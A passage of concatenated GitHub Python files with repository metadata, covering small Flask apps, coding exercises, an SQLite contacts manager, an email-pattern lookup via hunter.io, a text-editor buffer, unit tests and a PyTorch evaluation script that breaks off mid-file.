@api.doc(responses={201: \"Created\", 400: \"Validation error\"})\n @api.expect(post_model)\n @marshal_with(post_model)\n def put(self):\n \"\"\"POST or PUT method for adding marker to DB.\"\"\"\n add_report_to_db(\n latitude=request.json[\"latitude\"],\n longitude=request.json[\"longitude\"],\n color=request.json[\"color\"],\n comment=request.json[\"comment\"],\n )\n return request.json, 201\n","repo_name":"VetalM84/flaskFolium","sub_path":"maps/apis/api_v1.py","file_name":"api_v1.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14422500721","text":"from sincronizarBD import categorias, essencias, misturas\nfrom flask import Flask, render_template, redirect, url_for, request\nimport db_actions\n\nimport criadorEssencia\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n essencias = db_actions.getAllEssenciasSimple()\n return render_template(\"index.html\", essencias=essencias)\n\n@app.route('/misturas')\ndef misturas():\n misturas = db_actions.getAllMisturasSimple()\n return render_template(\"misturas.html\", misturas=misturas)\n\n@app.route('/form_criar_essencias')\ndef form_criar_essencias():\n return render_template(\"criador_essencias.html\")\n\n@app.route('/criar_essencia', methods=['POST'])\ndef criar_essencia():\n criadorEssencia.criarEssencia(request.form['nome'],\n request.form['marca'],\n request.form['desc'],\n request.form['preco'],\n request.form['foto'],\n request.form['qtd'],\n request.form['categoria'])\n return redirect(url_for(\"index\"))\n\n@app.route('/contato')\ndef contato():\n return render_template('contato.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"2904nando/narguis_sabores","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4998806724","text":"#!/usr/bin/env python 3\n\n############################################################################################\n# #\n# Program purpose: Sorts a list based on the first character of word. #\n# Program Author : Happi Yvan #\n# Creation Date : November 18, 2019 #\n# #\n############################################################################################\n\nfrom itertools import groupby\nfrom operator import itemgetter\n\nif __name__ == \"__main__\":\n word_list = ['be', 'have', 'do', 'say', 'get', 'make', 'go', 'know', 'take', 'see', 'come', 'think',\n 'look', 'want', 'give', 'use', 'find', 'tell', 'ask', 'work', 'seem', 'feel', 'leave', 'call']\n\n for (letter, words) in groupby(sorted(word_list), key=itemgetter(0)):\n print(letter)\n for word in words:\n print(word)","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/List/program-40.py","file_name":"program-40.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13003436888","text":"import sys\nsys.stdin = open(\"재미있는 오셀로 게임_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(T):\n N, P = map(int, input().split())\n data = [[0 for _ in range(N+1)] for _ in range(N+1)]\n data[N // 2 + 1][N // 2], data[N // 2][N // 2 + 1] = 1, 1\n data[N // 2][N // 2], data[N // 2 + 1][N // 2 + 1] = 2, 2 # 오델로 중앙에 W, B 놓기\n\n dx = [-1, 1, 0, 0, -1, 1, -1, 1]\n dy = [0, 0, -1, 1, -1, -1, 1, 1] # 상 하 좌 우 좌상 좌하 우상 우하\n for _ in range(P):\n x, y, P = map(int, input().split())\n data[x][y] = P # 오델로 데이터 받아오기\n\n for i in range(8):\n new_x = x + dx[i] # 돌 바꿔주기 위한작업\n new_y = y + dy[i]\n stack = []\n while 0 < new_x <= N and 0 < new_y <= N:\n if data[new_x][new_y] == 0:\n break\n elif data[new_x][new_y] != P:\n stack.append(new_x)\n stack.append(new_y)\n elif data[new_x][new_y] == P:\n while stack:\n turn_y = stack.pop()\n turn_x = stack.pop()\n data[turn_x][turn_y] = P\n break\n new_x += dx[i]\n new_y += dy[i]\n B = 0\n W = 0\n for x in range(N+1):\n for y in range(N+1):\n if data[x][y] == 1:\n B += 1\n elif data[x][y] == 2:\n W += 1\n print(\"#{} {} {}\".format(test_case+1, B, W))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/문제/수업/D-15/재미있는 오셀로 게임.py","file_name":"재미있는 오셀로 게임.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32660859369","text":"def solution(nums):\n answer = 0\n select = len(nums) // 2 # 뽑아야할 폰켓몬 최대 갯수는, nums 길이의 절반이다\n set_nums = set(nums) # 폰켓몬 종류 갯수는 set_nums 개이다\n \n if select < len(set_nums) : # 만약 뽑아야할 최대갯수가, set_nums보다 작다면 select가 최대갯수이다\n answer = select\n else : # 그렇지 않다면, 폰켓몬 종류 전체 갯수가 답이다\n answer = len(set_nums)\n \n return answer","repo_name":"KimHyungkeun/Algorithm","sub_path":"Programmers/Python/2021/모든문제/폰켓몬_플밍마에스터.py","file_name":"폰켓몬_플밍마에스터.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25205459957","text":"\"\"\"Phone Contacts\nThis program simulates a phone contacts app, allowing the user to add a new\ncontact, edit an existing contact, view all contacts, or delete a contact.\n\"\"\"\n\nimport sqlite3\nfrom sqlite3 import Error\nimport sys\n\nDATABASE = r\"./phone_contacts/main.db\"\n\n\ndef create_connection(db_file):\n \"\"\"returns a connection object to database file to interact with sqlite\"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as err:\n print(err)\n return conn\n\n\ndef create_table(conn, create_table_sql):\n \"\"\"creates contacts table if one does not already exist\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(create_table_sql)\n except Error as err:\n print(err)\n\n\ndef add_contact(conn, contact):\n \"\"\"adds the new contact to the contacts table\"\"\"\n query = '''INSERT INTO contacts(phone_number,first_name,\n last_name,addr,email_addr) VALUES(?,?,?,?,?)'''\n cur = conn.cursor()\n cur.execute(query, contact)\n conn.commit()\n return cur.lastrowid\n\n\ndef create_contact(conn):\n \"\"\"creates a new valid contact from user input\"\"\"\n valid = False\n print()\n while not valid:\n phone_number = input(\"Please enter in a valid phone number.\\n> \")\n cur = conn.cursor()\n try:\n cur.execute('''SELECT * FROM contacts WHERE\n phone_number = ?''', str(phone_number))\n check = cur.fetchall()\n if len(check) == 0:\n valid = True\n else:\n print(\"\\nYou already have this number saved in your contacts.\")\n except Error:\n if len(phone_number) <= 10:\n valid = True\n first_name = input(\"Please enter in the first name.\\n> \")\n last_name = input(\"Please enter in the last name.\\n> \")\n addr = input(\"Please enter in the full address.\\n> \")\n email_addr = input(\"Please enter in the email address.\\n> \")\n print()\n\n with conn:\n new_contact = (phone_number, first_name, last_name, addr, email_addr)\n add_contact(conn, new_contact)\n\n\ndef edit_contact(conn):\n \"\"\"edit information from a specified, existing contact\"\"\"\n cur = conn.cursor()\n print(\"\\nPlease enter in the phone number you would like to edit.\")\n choice = input(\"> \")\n\n cur.execute(\"SELECT rowid FROM contacts WHERE phone_number = ?\", (choice,))\n records = cur.fetchone()\n if records is None:\n print(\"This number is not currently saved as a contact.\\n\")\n else:\n print(\"\\nPress 'enter' if you would not like to change the info.\\n\")\n first_name = input(\"Please enter in the first name.\\n> \")\n if first_name != \"\":\n cur.execute(\"UPDATE contacts SET first_name = ?\", first_name)\n last_name = input(\"Please enter in the last name.\\n> \")\n if last_name != \"\":\n cur.execute(\"UPDATE contacts SET last_name = ?\", last_name)\n addr = input(\"Please enter in the full address.\\n> \")\n if addr != \"\":\n cur.execute(\"UPDATE contacts SET addr = ?\", addr)\n email_addr = input(\"Please enter in the email address.\\n> \")\n if email_addr != \"\":\n cur.execute(\"UPDATE contacts SET email_addr = ?\", email_addr)\n print()\n\n\ndef view_contacts(conn):\n \"\"\"print all contacts stored in contacts database\"\"\"\n query = '''SELECT * from contacts'''\n cur = conn.cursor()\n cur.execute(query)\n records = cur.fetchall()\n print(f\"\\nYOU CURRENTLY HAVE {len(records)} CONTACTS SAVED.\\n\")\n\n for row in records:\n print(f\"Phone Number: {row[1]}\")\n print(f\"First Name: {row[2]}\")\n print(f\"Last Name: {row[3]}\")\n print(f\"Address: {row[4]}\")\n print(f\"Email Address: {row[5]}\\n\")\n\n\ndef delete_contact(conn):\n \"\"\"delete a specified, existing contact\"\"\"\n cur = conn.cursor()\n print(\"\\nPlease enter in the phone number you would like to delete.\")\n print(\"If you would like to delete the entire contacts list, type 'all'\")\n choice = input(\"> \")\n\n if choice == 'all':\n cur.execute(\"DELETE FROM contacts\")\n else:\n cur.execute(\"DELETE FROM contacts WHERE phone_number = ?\", (choice,))\n conn.commit()\n print()\n\n\ndef main():\n \"\"\"initial set up for contacts database\"\"\"\n contacts = \"\"\" CREATE TABLE IF NOT EXISTS contacts (\n [contact_id] INTEGER PRIMARY KEY UNIQUE,\n [phone_number] NVARCHAR(10) NOT NULL UNIQUE,\n [first_name] NVARCHAR(50) NOT NULL,\n [last_name] NVARCHAR(50) NULL,\n [addr] NVARCHAR(255) NULL,\n [email_addr] NVARCHAR(255) NULL\n );\"\"\"\n\n conn = create_connection(DATABASE)\n create_table(conn, contacts)\n return conn\n\n\nINTRO = \"\"\"(´• ω •`) ♡ WELCOME TO YOUR PHONE CONTACTS! (´ε` )♡\nType 'add' to add a new contact.\nType 'edit' to edit a contact.\nType 'view' to view your contacts.\nType 'delete' to delete a contact.\nType 'quit' to quit the program.\n\"\"\"\n\nif __name__ == \"__main__\":\n print(INTRO)\n CONN = main()\n CHOICE = \"\"\n while CHOICE != \"quit\":\n CHOICE = input(\"Please select an option.\\n> \")\n if CHOICE == \"add\":\n create_contact(CONN)\n elif CHOICE == \"edit\":\n edit_contact(CONN)\n elif CHOICE == \"delete\":\n delete_contact(CONN)\n elif CHOICE == \"view\":\n view_contacts(CONN)\n CONN.close()\n sys.exit()\n","repo_name":"jenphan/python-projects","sub_path":"phone_contacts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39442927862","text":"# Farm de CPF automático kkkk\r\n\r\nfrom random import randint\r\n\r\ndigitos = list()\r\nsoma = list()\r\n\r\n# Consulta apenas os 9 primeiros dígitos do input\r\n\r\nfor num in range(0, 9):\r\n digitos.append(randint(0, 9))\r\n\r\n# Faz a multiplicação dos 9 dígitos de 10 a 2 e depois de 10 dígitos de 11 a 2\r\n\r\nfor v in range(0, 2):\r\n\r\n tam = len(digitos)\r\n\r\n for pos, n in enumerate(digitos):\r\n mult = n * (tam + 1)\r\n tam -= 1\r\n soma.append(mult)\r\n\r\n digito_novo = 11 - (sum(soma) % 11)\r\n\r\n if digito_novo <= 9:\r\n digitos.append(digito_novo)\r\n else:\r\n digitos.append(0)\r\n soma.clear()\r\n\r\n\r\nprint('Seu CPF é: ', end='')\r\nfor pos, digito in enumerate(digitos):\r\n print(digito, end='')\r\n if pos == 2 or pos == 5:\r\n print('.', end='')\r\n if pos == 8:\r\n print('-', end='')\r\n","repo_name":"Relampago14/CursodePython3-Udemy","sub_path":"exercício 9.py","file_name":"exercício 9.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35595617150","text":"import numpy as np\nimport pandas as pd\nimport requests\n\n#Sourcer Class to handle all sourcing functionality\nclass Sourcer:\n def __init__(self, hunter_api_key):\n self.hunter_api_key = hunter_api_key \n self.client_info_df = None\n\n #Create new client info dataframe using linkedin API\n def generate_client_info_df(self, companies, roles, num_contacts):\n return\n\n #Read existing client info csv into dataframe\n #Assuming client_info is all filled in except for email address (Columns: First Name, Last Name, Full Name, Company)\n def read_client_info_csv(self, path):\n self.client_info_df = pd.read_csv(path, delimiter=',')\n self.client_info_df = self.client_info_df.dropna(thresh=5) #Remove nan rows with at least 5 non Nan values in columns\n self.fill_emails()\n\n #Fills emails based on client_info_csv using hunter.io API, mutates existing objects client_info_df\n #Writes only sourced email addresses as CSV to Emails.csv\n def fill_emails(self):\n\n #Applied function to get email for individual based on company pattern\n def replace_email_format(company, firstName, lastName):\n pattern = email_address_map[company]\n email_address = pattern\n email_address = email_address.replace('{first}', firstName)\n email_address = email_address.replace('{last}', lastName)\n email_address = email_address.replace('{f}', firstName[0:1])\n return email_address\n\n #Read email address mappings\n email_address_map = {}\n companies = self.client_info_df.Company.unique()\n for company in companies:\n #API call to Hunter.io to get email format\n hunter_resp = requests.get('https://api.hunter.io/v2/domain-search?company=' + company + '&api_key=' + self.hunter_api_key)\n if hunter_resp.status_code != 200:\n raise ApiError('GET /tasks/ {}'.format(resp.status_code))\n pattern = hunter_resp.json()['data']['pattern'] + '@' + hunter_resp.json()['data']['domain']\n email_address_map[company] = pattern\n\n # Replace email address column with valid emails\n self.client_info_df['Email Address'] = self.client_info_df.apply(lambda row : replace_email_format(row['Company'], row['First Name'], row['Last Name']), axis=1)\n print(self.client_info_df)\n\n #Write Email Addresses Only to output CSV\n email_address_df = self.client_info_df['Email Address']\n email_address_df.to_csv('Emails.csv', header=False)\n\n #Write client info dataframe to output csv for use\n def write_client_info_csv(self, path):\n self.client_info_df.to_csv(path)\n\n \n ","repo_name":"wsxdrorange/Sourcer","sub_path":"Sourcer.py","file_name":"Sourcer.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37689427072","text":"\nclass EditBuffer(object):\n\n def __init__(self):\n self._first_line = _EditBufferNode(text=['\\n'])\n self._last_line = self._first_line\n self._current_line = self._first_line\n self._current_column_index = 0\n self._current_line_index = 0\n self._num_lines = 1\n self._insert_mode = True\n\n # Returns the number of lines in the text buffer.\n def num_lines(self):\n return self._num_lines\n\n # Returns the length of the current line that includes the newline character\n def num_chars(self):\n return len(self._current_line.text)\n\n # Returns the line index of the line containing the cursor. The first line has an index of 0\n def line_index(self):\n return self._current_line_index\n\n # Returns the column index of the cursor within the current line. The first position in each line has an index of 0\n def column_index(self):\n return self._current_column_index\n\n # Sets the entry mode to either insert or overwrite based on the value of the boolean argument insert.\n # True: insert mode\n # False: overwrite mode\n def set_entry_mode(self, insert=True):\n self._insert_mode = insert\n\n # Toggles the entry mode to either insert ot overwrite based on the current mode.\n def toggle_entry_mode(self):\n self._insert_mode = not self._insert_mode\n\n # Returns true if the current entry mode is set to insert and false otherwise\n def in_insert_mode(self):\n return self._insert_mode is True\n\n # Returns the character at the current cursor position\n def get_char(self):\n return self._current_line.text[self._current_column_index]\n\n # Returns the contents of the current line as a string that includes the newline character\n # If show_mode is True, the string will also include the position of the cursor\n def get_line(self, show_mode=False):\n if not show_mode:\n return ''.join(self._current_line.text)\n else:\n cursor_str_list = [' ' for i in range(self._current_column_index)]\n cursor_str_list.append('^\\n')\n return ''.join(self._current_line.text) + ''.join(cursor_str_list)\n\n # Moves the cursor up num lines. The cursor is kept at the same character position unless the new line is shorter,\n # in which case the cursor is placed at the end of the new lin, The num us negative, and the cursor position is not changed.\n def move_up(self, num=1):\n if num > self._current_line_index:\n num = self._current_line_index\n self._current_line_index -= num\n\n for _ in range(num):\n self._current_line = self._current_line.prev\n\n if len(self._current_line.text) - 1 < self._current_column_index:\n self._current_column_index = len(self._current_line.text) - 1\n\n # The same as move_up() except the cursor is moved down\n def move_down(self, num=1):\n if num > (self._num_lines - 1) - self._current_line_index:\n num = (self._num_lines - 1) - self._current_line_index\n self._current_line_index += num\n\n for _ in range(num):\n self._current_line = self._current_line.next\n\n if len(self._current_line.text) - 1 < self._current_column_index:\n self._current_column_index = len(self._current_line.text) - 1\n\n # Moves the cursor to the document's home position, which is the first line and first character position in that line.\n def move_doc_home(self):\n self._current_line = self._first_line\n self._current_line_index = 0\n self._current_column_index = 0\n\n # Moves the cursor to the document's end position, which is the last line and first character position in that line\n def move_doc_end(self):\n self._current_line = self._last_line\n self._current_line_index = self._num_lines - 1\n self._current_column_index = 0\n\n # Moves the cursor to the left one position. The cursor is warpped to the end ot hte previous line if it is currently at the front of a line.\n def move_left(self):\n if self._current_column_index == 0:\n if self._current_line is not self._first_line:\n self._current_line = self._current_line.prev\n self._current_line_index -= 1\n self._current_column_index = len(self._current_line.text) - 1\n else:\n self._current_column_index -= 1\n\n # Moves the cursor to the right one position. The cursor is warpped to the beginning of the next line if it is currently positioned at the end of a line.\n def move_right(self):\n if self._current_column_index == len(self._current_line.text) - 1:\n if self._current_line is not self._last_line:\n self._current_line = self._current_line.next\n self._current_line_index += 1\n self._current_column_index = 0\n else:\n self._current_column_index += 1\n\n # Moves the cursor to the front of the current line at the first character position\n def move_line_home(self):\n self._current_column_index = 0\n\n # Moves the cursor the end of the current line.\n def move_line_end(self):\n self._current_column_index = len(self._current_line.text) - 1\n\n # Starts a new line at the cursor position. A newline character is inserted at the current position and all\n # chatacters following are moved to a new line. the new line is inserted immediately following the current line\n # and the cursor is adjusted to be at the first position of the new line.\n def break_line(self):\n new_line = _EditBufferNode(text=['\\n'])\n\n new_line.prev = self._current_line\n new_line.next = self._current_line.next\n\n if self._current_line.next is not None:\n self._current_line.next.prev = new_line\n self._current_line.next = new_line\n\n if self._current_line is self._last_line:\n self._last_line = new_line\n\n self._current_line = new_line\n\n self._current_column_index = 0\n self._current_line_index += 1\n\n self._num_lines += 1\n\n # Removes the entire line containing the cursor. The cursor is then moved to the front of the next line. If the\n # line being deleted is the last line, the cursor is moved to the front of the previous line.\n def delete_line(self):\n if self._num_lines != 1:\n if self._current_line is self._first_line:\n self._current_line.next.prev = None\n self._current_line = self._current_line.next\n self._num_lines -= 1\n self._current_column_index = 0\n\n self._first_line = self._current_line\n\n elif self._current_line is self._last_line:\n self._current_line.prev.next = None\n self._current_line = self._current_line.prev\n self._current_column_index = 0\n self._current_line_index -= 1\n self._num_lines -= 1\n\n self._last_line = self._current_line\n else:\n self._current_line.prev.next = self._current_line.next\n self._current_line.next.prev = self._current_line.prev\n self._current_line = self._current_line.next\n self._current_column_index = 0\n self._num_lines -= 1\n\n # Removes all of the characters at the end of the current line starting at the cursor position.\n # the newline character is not removed and the cursor is left at the end of the current line.\n def truncate_line(self):\n new_text = [ch for ch in self._current_line.text[:self._current_column_index + 1]]\n new_text.append('\\n')\n\n self._current_line.text = new_text\n\n # Inserts the given character into the buffer at the current position. If the current entry mode is insert,\n # the character is inserted and the following characters on that line are shifted down; in overwrite mode,\n # the character at the current position is replaced. If the cursor is currently at a newline character and the\n # entry mode is overwrite, the new character is inserted at the end of the line. The cursor is advanced one\n # position. If ch is the newline character, then a line break occurs, which is the same as calling break_line()\n def add_char(self, ch):\n if ch == '\\n':\n self.break_line()\n\n else:\n if self._insert_mode:\n self._current_line.text.insert(self._current_column_index, ch)\n\n elif self._current_line.text[self._current_column_index] == '\\n':\n self._current_line.text.insert(-1, ch)\n else:\n self._current_line.text[self._current_column_index] = ch\n\n self._current_column_index += 1\n\n # Removes the character at the current position and leaves the cursor at the same position\n def delete_char(self):\n self._current_line.text.pop(self._current_column_index)\n\n # Removes the character preceding the current position and moves the cursor left one position. If the cursor is\n # currently at teh front of the line, the newline character on teh preceding line is removed and teh current line\n # and the preceding line are merged in to a single line\n def robout_char(self):\n if self._current_column_index == 0 and self._current_line is not self._first_line:\n self._current_line.prev.text.pop(-1)\n self._current_column_index = len(self._current_line.prev.text) - 1\n self._current_line.prev.text.extend(self._current_line.text)\n\n self.delete_line()\n if self._current_line is not self._last_line:\n self.move_up(1)\n else:\n new_text = self._current_line.text[self._current_column_index:]\n self._current_line.text = new_text\n self._current_column_index = 0\n\n # Deletes the entire contents of the buffer and resets it to the same state as in the constructor\n def delete_all(self):\n self.__init__()\n\n # Show the entire contents of the buffer\n def show_all(self):\n current_line_temp = self._first_line\n loop_count = 0\n while current_line_temp is not None:\n if loop_count == self._current_line_index:\n print(self.get_line(True),end='')\n else:\n print(''.join(current_line_temp.text),end='')\n loop_count += 1\n current_line_temp = current_line_temp.next\n\n\nclass _EditBufferNode(object):\n def __init__(self, prev=None, text=None, next=None):\n self.prev = prev\n self.text = text\n self.next = next\n\n\ndef main():\n print(\"creat a new EditBuffer\")\n edit_buffer = EditBuffer()\n print()\n print(\"show all: \")\n edit_buffer.show_all()\n print()\n\n string1 = \"def robout_char(self):\\n\"\n string2 = ' if self._current_column_index == 0 and self._current_line is not self._first_line:\\n'\n string3 = ' self._current_line.prev.text.pop(-1)\\n'\n string4 = ' self._current_column_index = len(self._current_line.prev.text) - 1\\n'\n string5 = ' self._current_line.prev.text.extend(self._current_line.text)\\n'\n string6 = '\\n'\n string7 = \" self.delete_line()\\n\"\n string8 = \" if self._current_line is not self._last_line:\\n\"\n string9 = \" self.move_up(1)\\n\"\n\n string_list = [string1, string2, string3, string4, string5, string6, string7, string8, string9]\n print(\"add characters to the edit buffer\")\n for string in string_list:\n # print(\"now adding the string: %s\" % string)\n for char in string:\n # print(\"now adding: %s\" % char)\n edit_buffer.add_char(char)\n\n print(\"show all: \")\n edit_buffer.show_all()\n print()\n\n print(\"move to the front of the first line and move 20 right:\")\n edit_buffer.move_doc_home()\n for _ in range(20):\n edit_buffer.move_right()\n\n edit_buffer.show_all()\n print()\n\n print(\"move down for 2\")\n edit_buffer.move_down(2)\n edit_buffer.show_all()\n print()\n\n\n print(\"number of lines: %d\" % edit_buffer.num_lines()) # Expected: 10\n print(\"number of characters: %d\" % edit_buffer.num_chars()) # Expected: 45 (44 characters + '\\n')\n print(\"line index: %d \" % edit_buffer.line_index()) # Expected: 2\n print(\"column index: %d\" % edit_buffer.column_index()) # Expected: 20\n print()\n\n print(\"get character of the current cursor: %s\" % edit_buffer.get_char())\n print()\n print(\"get line: %s \" % edit_buffer.get_line())\n\n print(\"move 10 right: \")\n for _ in range(10):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n print(\"move up for 100:\")\n edit_buffer.move_up(100)\n edit_buffer.show_all()\n print()\n \n print(\"move down by 2 and move right by 20 :\")\n edit_buffer.move_down(2)\n for _ in range(20):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n print(\"move down by 4:\")\n edit_buffer.move_down(4)\n edit_buffer.show_all()\n print()\n \n print(\"move to the end of the file:\")\n edit_buffer.move_doc_end()\n edit_buffer.show_all()\n print()\n \n print(\"move left:\")\n edit_buffer.move_left()\n edit_buffer.show_all()\n print()\n \n print(\"move right:\")\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n print(\"move up by 2 and right by 16:\")\n edit_buffer.move_up(2)\n for _ in range(16):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n print(\"move line home: \")\n edit_buffer.move_line_home()\n edit_buffer.show_all()\n print()\n \n print(\"move line end: \")\n edit_buffer.move_line_end()\n edit_buffer.show_all()\n print() \n \n print(\"break line: \")\n edit_buffer.break_line()\n edit_buffer.show_all()\n print()\n\n print(\"delete line:\")\n edit_buffer.delete_line()\n edit_buffer.show_all()\n print()\n\n print(\"move up by 6\")\n edit_buffer.move_up(6)\n edit_buffer.show_all()\n print()\n\n print(\"delete line:\")\n edit_buffer.delete_line()\n edit_buffer.show_all()\n print()\n\n print(\"move right by 30\")\n for _ in range(30):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n\n print(\"truncate line: \")\n edit_buffer.truncate_line()\n edit_buffer.show_all()\n print()\n\n print(\"move to line home: \")\n edit_buffer.move_line_home()\n edit_buffer.show_all()\n print()\n\n print(\"rubout char:\")\n edit_buffer.robout_char()\n edit_buffer.show_all()\n print()\n\n print(\"move right by 30\")\n for _ in range(30):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n\n print(\"rubout char: \")\n edit_buffer.robout_char()\n edit_buffer.show_all()\n print()\n\n print(\"delete all\")\n edit_buffer.delete_all()\n edit_buffer.show_all()\n print()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yuhanliu0121/learnDataStructure","sub_path":"Chapter9_Advanced_linked_Lists/3_TextEditor.py","file_name":"3_TextEditor.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6520515517","text":"import unittest\nimport sklearn\nfrom perceptron_class import Perceptron\nimport numpy as np\n\n\nclass TestPerceptron(unittest.TestCase):\n\n def setUp(self):\n self.num_inputs_nodes = 10\n self.num_neurons = 10\n self.pnn = Perceptron(self.num_inputs_nodes, self.num_neurons)\n\n def test__init__(self):\n num_of_inputs_plus_bias = self.num_inputs_nodes + 1\n self.assertTrue(self.pnn.weights.shape[0], num_of_inputs_plus_bias)\n self.assertTrue(self.pnn.weights.shape[1], self.num_neurons)\n self.assertEqual(self.pnn.weights.size, num_of_inputs_plus_bias * self.num_neurons)\n\n def test_train(self):\n self.num_inputs_nodes = 2\n self.num_neurons = 1\n self.pnn = Perceptron(self.num_inputs_nodes, self.num_neurons)\n\n x = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])\n # XORtargets = np.array([[0], [1], [1], [0]])\n targets = {'And data': np.array([[0], [0], [0], [1]]),\n 'Or data': np.array([[0], [1], [1], [1]])}\n self.assertTrue(targets['And data'].shape == self.pnn.predict(x).shape)\n\n for key, y in targets.items():\n self.pnn.train(x, y, 0.2, 200)\n preds = self.pnn.predict(x)\n self.assertTrue(np.array_equal(preds, y), msg=\"given {} not equals to the right answer: {}\".format(\n preds, y\n ))\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"gazon1/nn","sub_path":"perceptron/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8202088230","text":"from src.component import (Bell, Brakes, Chain, Tyres)\n\n\nclass ServicePerson:\n def __init__(self, bike):\n self.current_bike = bike\n\n\n def order_parts(self):\n fresh_parts = {\n 'bell': Bell(0, 10),\n 'brakes': Brakes(0, 20),\n 'chain': Chain(0, 30),\n 'tyres': Tyres(0, 40)\n }\n\n for key, component in self.current_bike.components.items():\n if component.check_condition() == 'Broken':\n self.current_bike.components[key] = fresh_parts[key]\n\n\n def service_parts(self):\n for component in self.current_bike.components.values():\n if component.check_condition() in ['Fragile', 'Poor']:\n component.set_current_state('Good')\n\n\n def oil(self):\n for key, component in self.current_bike.components.items():\n if component.check_condition() == 'Good' and key.capitalize() in ['Chain', 'Bell', 'Brakes']:\n component.set_current_state('Pristine')\n\n\n def pump_wheels(self):\n tyres = self.current_bike.components['tyres']\n\n if tyres.check_condition() == 'Good':\n tyres.set_current_state('Pristine')\n\n\n def service_bike(self):\n self.service_parts()\n self.oil()\n self.pump_wheels()\n\n\n def check_safety(self):\n if self.current_bike.ring_bell() == 'The bell fell off!':\n return False\n\n return self.current_bike.components['brakes'].check_condition() in ['Good', 'Pristine']\n\n\n def check_up(self):\n self.order_parts()\n self.service_bike()\n\n if self.check_safety():\n return self.current_bike.ring_bell()\n\n return 'there has been an error'\n","repo_name":"gheenie/py-bike-shop","sub_path":"src/service_person.py","file_name":"service_person.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43974133256","text":"import torch\nimport nets\nfrom dataloader import testloader\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\n\ndef evaluate(model, test_loader, model_name='weights.pt'):\n use_gpu = torch.cuda.is_available()\n if use_gpu:\n print('Evaluate Using CUDA')\n\n path = '../drive/My Drive/Colab Notebooks/' + model_name\n writer = SummaryWriter(comment='--{}--evaluate'.format(model_name))\n \n model.load_state_dict(torch.load(path))\n model.eval()\n\n if use_gpu:\n model.cuda()\n\n correct = 0\n total = 0\n with torch.no_grad():\n for inputs, labels in test_loader:\n inputs = inputs.cuda()\n labels = labels.cuda()\n\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels.data).sum().item()\n print('Accuracy:', 100 * correct / total)\n writer.add_scalar('Accuracy', 100 * correct / total, 1)\n\n\ndef get_prediction(model, test_loader, model_name='weights.pt'):\n use_gpu = torch.cuda.is_available()\n if use_gpu:\n print('Using CUDA')\n device = 'cuda:0' if use_gpu else 'cpu'\n\n path_ = '../drive/My Drive/Colab Notebooks/weights/' + model_name\n if not os.path.exists(path_):\n print('alo')\n path_ = 'weights/' + model_name\n \n model.load_state_dict(torch.load(path_))\n model.eval()\n\n if use_gpu:\n model.cuda()\n\n preds_ = torch.tensor([], dtype=torch.int64, device=device)\n labels_ = torch.tensor([], dtype=torch.int64, device=device)\n with torch.no_grad():\n for inputs, labels in test_loader:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n preds_ = torch.cat((preds_, predicted), dim=0)\n labels_ = torch.cat((labels_, labels), dim=0)\n\n preds_ = preds_.cpu()\n labels_ = labels_.cpu()\n return preds_, labels_\n\n\nif __name__ == '__main__':\n # net = nets.VGG16(pretrained=False)\n # net = nets.VGG16_BN(pretrained=True)\n # net = nets.ResNet50(pretrained=False)\n # net = nets.ResNet50_Normal(pretrained=False)\n # net = nets.MobileNetV2(pretrained=False)\n net = nets.MobileNetV2_Normal(pretrained=False)\n \n test_loader = testloader(colab=True)\n # evaluate(net, test_loader, model_name='vgg16_bn_pretrained_augmented_96batch.pt')\n pred, truth = get_prediction(net, test_loader, model_name='vgg16_bn_pretrained_augmented_96batch.pt')\n \n target_names = ['bulbasaur', 'charmander', 'jigglypuff', 'magikarp', 'mudkip', 'pikachu', 'psyduck', 'snorlax', 